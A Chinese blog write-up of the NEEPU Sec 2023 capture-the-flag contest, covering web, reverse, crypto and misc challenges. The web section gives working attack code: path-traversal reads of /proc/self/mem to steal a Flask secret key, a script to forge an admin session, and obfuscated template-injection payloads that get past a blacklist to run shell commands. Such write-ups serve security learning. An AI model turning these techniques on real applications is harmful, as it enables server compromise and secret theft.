NEEPU Sec 2023 公开赛 writeup

最新推荐文章于 2024-06-24 18:14:21 发布
最新推荐文章于 2024-06-24 18:14:21 发布
阅读量2.4k 收藏 1
点赞数 2
文章标签: python 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42880719/article/details/130798835
版权

文章目录

Web

Cute Cirno

学艺不精的我脑袋要炸了

在Cirno界面的源代码中发现任意读

在这里插入图片描述

考虑之前的比赛看到过一个任意读文件,是考SECRET_KEY

这里尝试让他报错,因此我访问了http://neepusec.fun:28723/r3aDF1le?filename=…/…/…/…/…/proc/self/mem

在这里插入图片描述

读取CuteCirno.py并保存

from flask import Flask, request, session, render_template, render_template_string
import os, base64
from NeepuFile import neepu_files

CuteCirno = Flask(__name__,
                  static_url_path='/static',
                  static_folder='static'
                  )

CuteCirno.config['SECRET_KEY'] = str(base64.b64encode(os.urandom(30)).decode()) + "*NeepuCTF*"

@CuteCirno.route('/')
def welcome():
    session['admin'] = 0
    return render_template('welcome.html')


@CuteCirno.route('/Cirno')
def show():
    return render_template('CleverCirno.html')


@CuteCirno.route('/r3aDF1le')
def file_read():
    filename = "static/text/" + request.args.get('filename', 'comment.txt')
    start = request.args.get('start', "0")
    end = request.args.get('end', "0")
    return neepu_files(filename, start, end)


@CuteCirno.route('/genius')
def calculate():
    if session.get('admin') == 1:
        print(session.get('admin'))
        answer = request.args.get('answer')
        if answer is not None:
            blacklist = ['_', "'", '"', '.', 'system', 'os', 'eval', 'exec', 'popen', 'subprocess',
                         'posix', 'builtins', 'namespace','open', 'read', '\\', 'self', 'mro', 'base',
                         'global', 'init', '/','00', 'chr', 'value', 'get', "url", 'pop', 'import',
                         'include','request', '{{', '}}', '"', 'config','=']
            for i in blacklist:
                if i in answer:
                    answer = "⑨" +"""</br><img src="static/woshibaka.jpg" width="300" height="300" alt="Cirno">"""
                    break
            if answer == '':
                return "你能告诉聪明的⑨, 1+1的answer吗"
            return render_template_string("1+1={}".format(answer))
        else:
            return render_template('mathclass.html')

    else:
        session['admin'] = 0
        return "你真的是我的马斯塔吗?"


if __name__ == '__main__':
    CuteCirno.run('0.0.0.0', 5000, debug=True)

能观察到这里也用了SECRET_KEY

找到蓝帽杯初赛-file-session的wp

https://erroratao.github.io/2022/07/10/File_Session/#%E8%93%9D%E5%B8%BD%E6%9D%AF%E5%88%9D%E8%B5%9B-file-session-%E8%A7%81%E8%A7%A3

然后看看view-source:http://neepusec.fun:28723/r3aDF1le?filename=…/…/…/…/app/NeepuFile.py

在这里插入图片描述

他自己做了end - start

因此修改一下题目中提到的脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import re
import sys
reload(sys)
sys.setdefaultencoding('utf-8')

url_1 = "http://neepusec.fun:28723/r3aDF1le?filename=../../../../../proc/self/maps"
res = requests.get(url_1)
maplist = res.text.split("\n")

for i in maplist:
    m = re.match(r"([0-9A-Fa-f]+)-([0-9A-Fa-f]+) rw", i)
    if m != None:
        start = int(m.group(1), 16)
        end = int(m.group(2), 16)
        url_2 = "http://neepusec.fun:28723/r3aDF1le?filename=../../../../../proc/self/mem&start={}&end={}".format(
            start, end)
        res_1 = requests.get(url_2)
        if "*NeepuCTF*" in res_1.text:
            print start
            print end
            print url_2

在这里插入图片描述

在其中一个里面找到kmp5Kotbfv2slKsa0QmanJtVbc5w/+ksRelAfPqp*NeepuCTF*

import base64
from flask import *
import pickle


SECRET_KEY = "kmp5Kotbfv2slKsa0QmanJtVbc5w/+ksRelAfPqp*NeepuCTF*"
app = Flask(__name__)
app.config.update(dict(
    SECRET_KEY=SECRET_KEY,
))


@app.route("/", methods=['GET', 'POST'])
def login():
    session['admin'] = 1
    return 'mu'


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=11451)

在这里插入图片描述

拿到admin的session为eyJhZG1pbiI6MX0.ZGhpmA.I864rEAyzi7sKOWNnzqiP1tIl4g

访问genius,带上session

在这里插入图片描述

在这里插入图片描述

ssti

这里可以参考到ctfshow ssti 题目第369题和网络安全平台测试赛的一个比赛

这里用{%print((lipsum|lower|list))%}查到字符

['<', 'f', 'u', 'n', 'c', 't', 'i', 'o', 'n', ' ', 'g', 'e', 'n', 'e', 'r', 'a', 't', 'e', '_', 'l', 'o', 'r', 'e', 'm', '_', 'i', 'p', 's', 'u', 'm', ' ', 'a', 't', ' ', '0', 'x', '7', 'f', '2', 'c', '6', '4', 'b', 'f', '1', '8', '2', '0', '>']

通过写个脚本获取到__globals__,__getitem__,os,popen,read

然后因为过滤了pop,采用数组的方式获取值

在这里插入图片描述

在这里插入图片描述

但是这里复现的时候没有字符d,当时做的时候lipsum里面正好有呜呜呜,导致用不了read,于是从(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)中取

在这里插入图片描述

(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]中取到
在这里插入图片描述

上面执行的是ls,这里再看一下ls /

{%print(lipsum[(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]][(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[11]~(lipsum|lower|list)[5]~(lipsum|lower|list)[6]~(lipsum|lower|list)[5]~(lipsum|lower|list)[11]~(lipsum|lower|list)[23]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]]((lipsum|lower|list)[7]~(lipsum|lower|list)[27])[(lipsum|lower|list)[26]~(lipsum|lower|list)[7]~(lipsum|lower|list)[26]~(lipsum|lower|list)[11]~(lipsum|lower|list)[3]]((lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[9]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[312])[(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]]())%}

在这里插入图片描述

有一个readflag和flag,应该是要执行readflag,先试试读flag(cat /flag)

{%print(lipsum[(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]][(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[11]~(lipsum|lower|list)[5]~(lipsum|lower|list)[6]~(lipsum|lower|list)[5]~(lipsum|lower|list)[11]~(lipsum|lower|list)[23]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]]((lipsum|lower|list)[7]~(lipsum|lower|list)[27])[(lipsum|lower|list)[26]~(lipsum|lower|list)[7]~(lipsum|lower|list)[26]~(lipsum|lower|list)[11]~(lipsum|lower|list)[3]]((lipsum|lower|list)[4]~(lipsum|lower|list)[15]~(lipsum|lower|list)[5]~(lipsum|lower|list)[9]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[312]~(lipsum|lower|list)[1]~(lipsum|lower|list)[19]~(lipsum|lower|list)[15]~(lipsum|lower|list)[10])[(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]]())%}

在这里插入图片描述

结果是空的,应该就是要执行/readflag了

http://neepusec.fun:28692/genius?answer={%print(lipsum[(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]][(lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[11]~(lipsum|lower|list)[5]~(lipsum|lower|list)[6]~(lipsum|lower|list)[5]~(lipsum|lower|list)[11]~(lipsum|lower|list)[23]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18]]((lipsum|lower|list)[7]~(lipsum|lower|list)[27])[(lipsum|lower|list)[26]~(lipsum|lower|list)[7]~(lipsum|lower|list)[26]~(lipsum|lower|list)[11]~(lipsum|lower|list)[3]]((lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[312]~(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]~(lipsum|lower|list)[1]~(lipsum|lower|list)[19]~(lipsum|lower|list)[15]~(lipsum|lower|list)[10])[(lipsum|lower|list)[14]~(lipsum|lower|list)[11]~(lipsum|lower|list)[15]~(lipsum|attr((lipsum|lower|list)[18]~(lipsum|lower|list)[18]~(lipsum|lower|list)[10]~(lipsum|lower|list)[19]~(lipsum|lower|list)[7]~(lipsum|select|lower|list)[12]~(lipsum|lower|list)[15]~(lipsum|lower|list)[19]~(lipsum|lower|list)[27]~(lipsum|lower|list)[18]~(lipsum|lower|list)[18])|lower|list)[32]]())%}

在这里插入图片描述

这里替换给我替换麻了。看Revenge去

Cute Cirno(Revenge)

操作同上()

执行的app.py的文件名用proc/self/cmdline看到CuteCirnoRev.py

http://neepusec.fun:28698/r3ADF11e?filename=…/…/…/…/…/app/CuteCirnoRev.py

其他操作不变 payload不变

Rev

How to use ida?

IDA打开就行

在这里插入图片描述

Base

在这里插入图片描述

查看encode_1和encode_2

encode_1:rot偏移3

在这里插入图片描述

encode_2:base64

在这里插入图片描述

welcometotheworldofctf

Neepu{welcometotheworldofctf}

How to use python?

在这里插入图片描述

import string
from tqdm import tqdm

table = string.printable
for i in tqdm(table):
    for j in table:
        for k in table:
            for h in table:
                s = i+j+k+h
                if(sum(ord(x) * 10000 ** i for i, x in enumerate(s[::-1])) ==110009500490115):
                    print(s)

import hashlib
import string
from tqdm import tqdm

table = string.printable
for i in tqdm(table):
    for j in table:
        for k in table:
            for h in table:
                flag = f'Neepu{{Pyth0n_1s_a_t{i}{j}l_{k}1{h}ku}}'.encode()
                m = hashlib.sha256(flag).hexdigest()
                if(m == 'a04f00829f27a5ead1c4ae526d6b1b0cec30ed0e56d6d71e9c001d7803e84892'):
                    print(flag)#Neepu{Pyth0n_1s_a_t00l_y1_ku}

IKUN检查器

dnspy打开

在这里插入图片描述

分别看

在这里插入图片描述

somd5解得到1998-8-2

在这里插入图片描述

somd5解得到jinitaimei

在这里插入图片描述

中间加-

在这里插入图片描述

解aes
在这里插入图片描述

最后输入

在这里插入图片描述

就是输入的sha256值,即Neepu{b8688fc33b5786095dc70a34ad14b9623905185663fa26dcc75d3b6b1f69999e}

junk code

加了花指令,而且正常运行的时候确实能发现输出了第二个字符,猜测有sleep,虽然加了花指令,但是这个不影响

在这里插入图片描述

nop掉

在这里插入图片描述

保存运行

在这里插入图片描述

Neepu{it-1s-not-junk-code-1u-1u-the-qq-bin-mat}

Crypto

FunnyRsa

看见e=3,直接带摸板

import gmpy2
import binascii

e = 3
n = 508480854372756755913791101745305762457517298159680989644747340327036977578527505318324958633232739687251409520866901608437945927574543155971443209922394847753303798988837755432365056098925797113097436966052676591464802061455795339989784949253878654243424430112737855583276666468348152646780267313723933052043652043457805179867064143032058107197027709609118240936819964179830722897401341043667501298533160902654255596452348828855631402136248161345374217307571507612687845128249648000080509946611349654016724007920186542131491886281036913471846314065665956824568534254734060468248256266109011728508043378818494008953002180704766570040343479609214117050941617109009620565019399761765253703071237034374358239723604390448411521487409469419576049566386525066685041905464761757345225778527338430347014422459954532168552493706796761693553297732745470452288495224654530482329002451540376107539184656257369225752541361996356642232449580990809290287044068126307915255465596308681516279323181254599943979030260297865604529605690218915679197797309258313924963034175283390070634287196300753230812822254122160704736109171545494720552113142650620106205647711854004731168393093254452512276389945341818288720153371447538338764655583233355044033698253
c = 1811190934126864017324358781557112607374925418749516169609783406151778537247582927245777048528376193187995730195136886128337489858508361912939739791856453029029472008503849636323475596821894021085406391087644300429282015652303512547583242875798709634440100351468653278854842376234162516591017755925768811542318681182791159664625408669418924102547889582147686273287037619637618739708338600060067635958832146122636281342410738805977631878905617340110767089538025585058506632889042141695774769826454213414615721715636679099281147824773004445559938086334729812819928608583224897377

i = 0
while True:
    if gmpy2.iroot((c+i*n),3)[1] == True:#gmpy2.iroot(x,n) x开n次根
        m = gmpy2.iroot((c+i*n),3)[0]
        break
    i += 1

print(binascii.unhexlify(hex(m)[2:]))
#b'Dear OOD PERSON,\n\nNeepu{1nterest1ng_D0_y0u_kn0w?}Welcom to NeepuCTF!G00d luck!!!'

Loss

题目和crypto感觉没多大关系,当misc做

发现hex(k)[2:]没有zfill,看了一下ct缺2,key缺3。因此写个脚本爆破

from Crypto.Cipher import AES
from tqdm import tqdm

def DecryAES(ct,key):
    ct,key = bytes.fromhex(ct),bytes.fromhex(key)
    aes = AES.new(key,AES.MODE_ECB)
    m = aes.decrypt(ct)
    return m

ct  = '98691cbec88e449e8bac58e91142269a7da5efa9e7c62848e7135f1150f02a'
key = '8ee2b28564433679d93b82873fe8a'
ct_arr = []
key_arr = []
for i in range(len(ct)+1):
    for j in range(i,len(ct)+1):
        mod_ct = ct[:i] + '0' + ct[i:j] + '0' + ct[j:]
        ct_arr.append(mod_ct)
for i in range(len(key)+1):
    for j in range(i,len(key)+1):
        for k in range(j,len(key)+1):
            mod_key = key[:i] + '0' + key[i:j] + '0' + key[j:k] + '0' + key[k:]
            key_arr.append(mod_key)
for ct2 in tqdm(ct_arr):
    for key2 in key_arr:
        m = DecryAES(ct2,key2)
        if(b'Neepu' in m):
            print(m)

在这里插入图片描述

loud

同之前的d3 的d3noisy的leak

官方的脚本:

在这里插入图片描述

改一下(事实上这题搞了很久没有像wp这样简单)

from sage.all import *
from sympy import nextprime

p=[66467878562792562224887473415011035371976498729276781135103070806273826602147, 87779827664444719705378632508432527366151596527264599732383282214161710342059, 106478845076259796180788022071614290976203859464583466743581048528447954519879, 96059795988661207615203630115134173796188205316583242342092930969746956840537, 76648433583138097341785050433545276046328401071616329410459071963649387342037, 75363807436621723536569872393312030066473340867618075065014040776064056013377, 84549506983821330145587582824091845683589581353932033068622843538281197238321, 111370876180722361599897961586244954018438484624454058266043059162224754345369, 64482965162169334114246637526347201196498007629645251181883638859700004974179, 115737745133463165088409210929201564518908251675851193212090312153202710950611, 65430568356698229457733164116539029669340192339524852345167889932007830803713, 83005759669335703543538842561745612525242745913149020160169673469294684269349, 86695300569990829413494539259312051326564517598709183416846805385774886176327, 87649503475806433108642579024197030978459906709386640769733298397489631575119, 67546279258240068058305769281370224151667980031696762855998467222703960646549, 109277222890519331704406685175081474974918071159722270158398833428598261621993, 94947541482876422720663520475916415155713415168744242709306335577278248129671, 72169704519430039945520319412623531417839608722431394881643470024106954771823, 67960163975784724339119270210646072354375119081204577840800359343098463410911, 99600976311231076437603674530239237427983536499904250636338541144596856152681]
S=[[36006797306819385066479875554093947690583427970449583820207929310836800884907, 42421831928852572111305575764455253114855197661030346257979092292334693704638, 12802758082612276306666301210467012086210333405770973816248015272325645518737, 35891119003347284519077367147618128608424314149438118637710340094202006973607], [69221811235046204007409195125183399115207721139473251108686359647136964539528, 68728546052531932227774742525240050245981893208569278338806756195046394386320, 77378932313251132635143406501260917558950175409375255430759788116685665756853, 52610629088183684552705334542273079173241031671071904128690224212767984326814], [84632180774187758644772651231005808936754972376616591239738706882585325508504, 22245885241129428291065279034982203110690225047634487933389806520943556010139, 65058154300579433325392929157176043693547112910255708084394089838078169979653, 26450521689799343844879689401496427283279097300795496218417820952255310453381], [31743210200723432871171527300926464156713378567872351797727553809801223755669, 13585899089974057026763852048073375117825112528263695778864069316682632842469, 61718974141826995988697061776372539645461814294568567001726256109104825647174, 51180314603392071189287058511013567287870020999513958065031674007822278281592], [54972437884087220348657249916515696089000557932808046438758622081654015388431, 60595394189514447466338506137494568375465810079275014516953880523799578017650, 48290106501584587524538351792623115913538457076946109833703750186838567097829, 75809640108047877199495621711957016420204838905577105767711805228492185803198], [2043782039074334576524460230918369530353673853539675192552828729137718721899, 49835004172676327317136633790276532689791891581739516605994211773520862094089, 74150446127124215081973853925119891529594162176613983713739514646864857274598, 3870903633214309884568064156029910145031131868082685800718700340446754642668], [58530922734504496400650172153260509666806593206632885245359170202099163777029, 24679955301703325026039585637067957593890919790442322117013190013849632870045, 47461847478301275711387089619360312020232490159064156700718722079533108310495, 78436661760605062831488783213279281637896003485976271847409520316669048162591], [3960169205004685923298734670827529710258905436583484891133449600679523626998, 56971763036590510871648632641525055519742294555040115044720432874482626152527, 7500941845513450196840656641552395008944195976110947855355515297144549893577, 104364444158131675753431216431697712763613996035708348677723420914206545999308], [21090310989423433113256120275297260716078136824734467530250689161392790805917, 59095240674034520085214866457855433129352762312493710903594522366480317145097, 25950268632849909273587896220763105221984980662119437334003683923010964181793, 22214910913289817220594820237750728594412035322558117144502181839908519483813], [6516207309607110723013310828779534786605721487724433166085213573594060054191, 62491095915002854769743893168840271080994195414466604510886959458801333994425, 43298696119722427147738220942971604096101207270771677319478440633957185506012, 95999300849358990419162309412086189707629278626118528491801630061635930409174], [21901937371736027133484836626793049950863305103635439434565692334061323247459, 22177707944556298482781825594816606678702151909926553218938857302296851101061, 37265517992688571580384548897674161792052985496826940853296718063969030761085, 45803015810935362104176472501216732994877801735307247883040947086374864784522], [22887302429552282917137975404437379689230279867683032429064655381687354309967, 63687512791087585071097169701758075850922324857489524802811455099431146712006, 43241233600118761031756067392063544631958472413548145463886944168747993611755, 78540416079875697330277927812643707908744419489483603613867805715379418188382], [83274701456245595041914535781657541250722792681868330743604458671030342631093, 29265221035131869074958665850197081103720257562467498607821734305785454256445, 19656036104607964818483236621454584533830854692521644548949580232419092579485, 36685991496747026794589417986750583003976651961717444764360736602328859939203], [7197271849934394038490337096465830651019854061628854994110403632096530818658, 13199583400545916173897024693988359528617080325104182927755868559199746329580, 76705903744610047925943025263768006533642196751938988456317343613219129386367, 8284847848213860404087592474405055922947517109038702885136704630947806019241], [40192513898904947184731216279798716826510915071804534174239538082671192078053, 756883344718645808681598066443462390307116757281839378450937721653214302485, 46319296839244788373603804279624137323125709215284595152627739510983625831713, 38066834404440733412548216101182968084184940639461830700714702917736840764910], [52459924240743004858678271074727889512634425322058383892565820049302166247484, 1124830903052334805081369416754962375712146318972731973481260141314675294280, 7048586820754100983732909765398789018269542052380424872274364753361851089050, 46261533803791211860667474793341333491934930635468558951890405299902112599717], [23712997405587065505471765580307890926020635436932008780552027395793174460196, 67696894015776789806885369424535665938702806354704500197616129889160343225036, 22335907790107175161378264382954791596027764567679319454957440806458200559861, 76817272441881586284817699756225532359147752598882508352406898668675942956599], [48442733699161048528383543478196401606393182356208996862954079146924798030016, 33988046942702399144226829264100378601075005547176282333019034404108127701223, 3878811651113775226499837109875057444157158981192358109242560352485567236840, 48096508435450140842190594378561970076075899550630622502080370324305787016204], [4661700708549906139665791533582485338344505441635713456342199101346895847315, 57085434497175712126874334119472545667616658739402471396702109228089918012639, 43291903057149273908186130451801222008858189682043034712173498638683726314620, 43681777323686685006867808938443372833327865869793588659920726812432020143637], [34817244237217626483621974571192315048341502556634007719371004295715069335162, 10855671893795758052388714204250213675262352053079039688785650172729770783108, 55808546957704772545340135312880985328286637622927964296444521648705445287337, 57996505385421171401445757882512186395065784033051493647151141293523405436642]]

n = 20
m = 4
B = 2**4096
P = 1
for i in range(n):
    P *= p[i]
    L = []
for i in range(n):
    t = inverse(P//p[i],p[i])
    L.append(t*(P//p[i]))

BB = matrix(n*m+1)
BB[0,0] = P
for i in range(n):
    for j in range(m):
        t = i*m + j
        BB[t+1,t+1] = B
        BB[t+1,0] = S[i][j] * L[i]
red = BB.LLL()
f = open(r'C:\Users\mumuzi\Desktop\outs.txt','w').write(str(red))

然后打开发现只有第一行的是一个正数和一坨0,其他都是有负数的,然后这里只有flag有值,原题是N也有15个值,因此第一行这个是符合要求的

因此尝试提交116926347417973739813389504748758673981034015364501761586986653891072159614466535442285940993424509487983408826535446174908960805420415826892247095629899711028817120829492104752602407109216917926271092220486968841156519990362949657487794025464819714162899699678997721569868660164545620667051526447422139521078040002214106645807945132338049458476984219774549279366132880281262873259579336469061431142093875314095384936916552701093157363813120451972804242781688459725262869243990446191731213239849534613643610956337393952997289528155686740057414072272137510704615005549047461973455194160253722511339247030805640858589842699243553893990352636820643317189483800653004195589918829455999679822736492945367960846445909281065494949166307806389546596789298753332846823642742703456348160285521746213654908420577340508033880925137019362574079782798769495078307996462897694930462678432564135136546708085518325059843563577692800896695337469509988693835802560372443455806502280391274164995314797779082864525968072787575692490640928881743177623466702363671996974454074849781021299229369520112211636727082759319836173414882071943165226884042463530718394000680023200019847602023738930464764671560604546094707989602894519207930387266023700987775382170,通过

Misc

吉林第一站

google搜图、百度识图

第一张图由于电脑上无法加文字,用手机

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

Neepu{zhuqueshan_songhuahu_dongbeidianlidaxue}

倒影

文件尾有个倒过来的png,手动分离然后再反转

f = open('reflection2.png','rb').read()
fw = open('re.png','wb').write(f[::-1])

在这里插入图片描述

发现两张图一样,但是用stegsolve直接xor出现蓝色线条,直接考虑盲水印

在这里插入图片描述

Neepu{THe_S3cR3t_UNd3r_t4e_R3fl3Ct10n}

Shiro

给了个流量包,能看到有五个很大的post,分别解码cmd,发现有个base64读取docx,还有一个读取了id_ssh

然后neepu跟的参数是一个class文件

在这里插入图片描述

jadx打开发现流量包的响应得到的内容是与某个key异或得到的

在这里插入图片描述

由于流量包拿了id_rsa且知道id_rsa的头,因此直接异或就能得到key

在这里插入图片描述

th1s_1s_n33pu_K4y

然后拿去解其他的,能够把docx的解出来

在这里插入图片描述

在这里插入图片描述

得到part2为W0wYoUF1ndMyAn0th3rS3cr3t

然后第一段需要爆破,当时爆了很久没爆出来,给了个hint是一个rockyou的部分密码

在这里插入图片描述

得到密码,最后得到flag是Neepu{nroamntiriina_W0wYoUF1ndMyAn0th3rS3cr3t}

重生之我是CTFer

就一直答题一直答题也不知道怎么的就过了答很多次
在这里插入图片描述

问卷

总之做了
.(img-VRDjB8lO-1684685036215)]

是Mumuzi
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2023 强网杯 Writeup
01-29
2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析和知识点总结...
阿里云ctf比赛writeup
04-26
阿里云CTF比赛Writeup详解 在网络安全领域,Capture The Flag(CTF)是一种常见的竞赛形式,参赛者通过解决各种安全挑战来展示他们的技术能力。阿里云CTF比赛提供了多种类型的挑战,包括Web、Misc、Pwn、Reverse和...
2023第五届 Real World CTF 体验赛 Writeup(web)
一只爱吃橙子的羊
01-12 2479
2023第五届 Real World CTF 体验赛 Writeup(web)
neepu sec
zty___的博客
01-28 490
wp: 简单的摩斯密码:Crypto1 直接可以找到脚本网站:https://www.jb51.net/tools/morse.htm 这样就得到flag
[NEEPU Sec 2021 公开赛]WP
woshilnp的博客
05-26 841
[NEEPU Sec 2021 公开赛]WP 前言: 这哪是新生赛呀,web方向题目难度还是特别高的,但是复现之后感觉质量真的挺高的,这里记录下感觉有点意思的题目 随便注2.0 这里过滤了上传用了的字符: return preg_match("/select|update|delete|drop|insert|where|rename|set|handler|char|\*| | |\./i",$inject); 但还是先注出一些有用的数据先把: 0%27;show%0ddatabases;%23 0%2
Neepu Sec 2023公开赛Reverse题目复现
OrientalGlass的博客
05-22 930
可以看到做了对flag的判断,分别截取flag的不同部分并调用不同的check函数最后将加密结果拼接起来并输出结果。text是密文,bytes是密钥,并且可以看到Mode是ECB,PaddingMode是PKCS7。sha256,也就是把上面得到的结果拼接起来进行hash(也可以运行程序通过验证得到flag)最后组合到的掩码Neepu{Pyth0n_1s_a_t?​将程序用dnSpy打开后,点击From1,可以找到check1~check5函数。可以发现是C#编写的,使用dnSpy分析。
Neepu ctf wp
lucky_boyQAQ的博客
05-25 828
Neepu ctf wp 拿了个第一,AK了re,哈哈哈还是可以。 ID:The_Itach1 总排名: 1 分数: 8347 re OLLEH 有点可惜,本来可以一血的,被NEEPU给迷惑了,哈哈哈。 ida看,流程,动调比较快 动调绕过得到 MD5加密一下,故flag为 Neepu{a4db343d5faf70bc4fb88dd8d4dc86de} easyre 开始分析是分析exe文件,然后看了里面的一些字符串,什么.net之类的,后来发现flag在dll里面。 用dSspy打开dll,找到
自己ctf比赛writeup.zip
10-01
比赛项目源码
一些比赛或练习的writeup.zip
10-01
比赛项目源码
CTF比赛收集的赛题和writeup.zip
09-30
比赛项目源码
【NepCTF2023】复现
leekos的博客,分享web安全相关知识~
08-16 4006
复现完这题学到了很多关于内网中代理等知识,学到了venom工具构造socks5代理,使用proxifier的方式打开工具,有点像给系统加了一个代理。
NEEPUSec CTF 2023 Loss
Emmaaaaa's blog
06-02 1178
确实是一开始没注意到0的缺失,只知道缺失了,当时看到myhex()函数以为就是单纯的字节转16进制,但后面转念一想如果只是普通的转法,大可直接用byte_data.hex(),所以说都是有含义的啊。技不如人,没什么好说的,坚持学吧。怎么讲呢,就发现自己越多不会,动力还就越大了。
NEEPU Sec 2023-misc方向wp
toto的博客
05-21 909
菜的不行,二维码原题都没做出来(
Neepu2023-部分Reserve复现
m0_73393932的博客
05-26 824
逆向
2023年2月国内外CTF比赛时间汇总来了!
网络安全
02-08 4849
2月国内外CTF比赛时间汇总
2023 铁人三项 CTF --- Misc wp
3tefanie丶zhou的博客
01-12 2328
【不被喜欢的姑娘喜欢,是一件很伤心的事情,可天没有塌下来,该怎么活,还得怎么活。】
pytorch库 03 基础知识
最新发布
weixin_42830015的博客
06-24 447
pytorch库 03 基础知识
Windows系统上更换pip源的详细指南
2402_85758349的博客
06-21 426
Python的包管理工具pip允许用户从Python包索引(PyPI)下载和安装第三方库。然而,默认的PyPI源有时可能因为网络问题或地理位置导致访问速度较慢。更换为更快的源可以显著提高下载和安装Python包的速度。本文将详细介绍如何在Windows系统上更换pip的源。
Ubuntu 18.04 安装 PCL 1.14.1
u014374826的博客
06-21 700
Ubuntu 18.04 安装 PCL 1.14.1
oscp 2023 challenge writeup-medtech-csdn博客
10-29
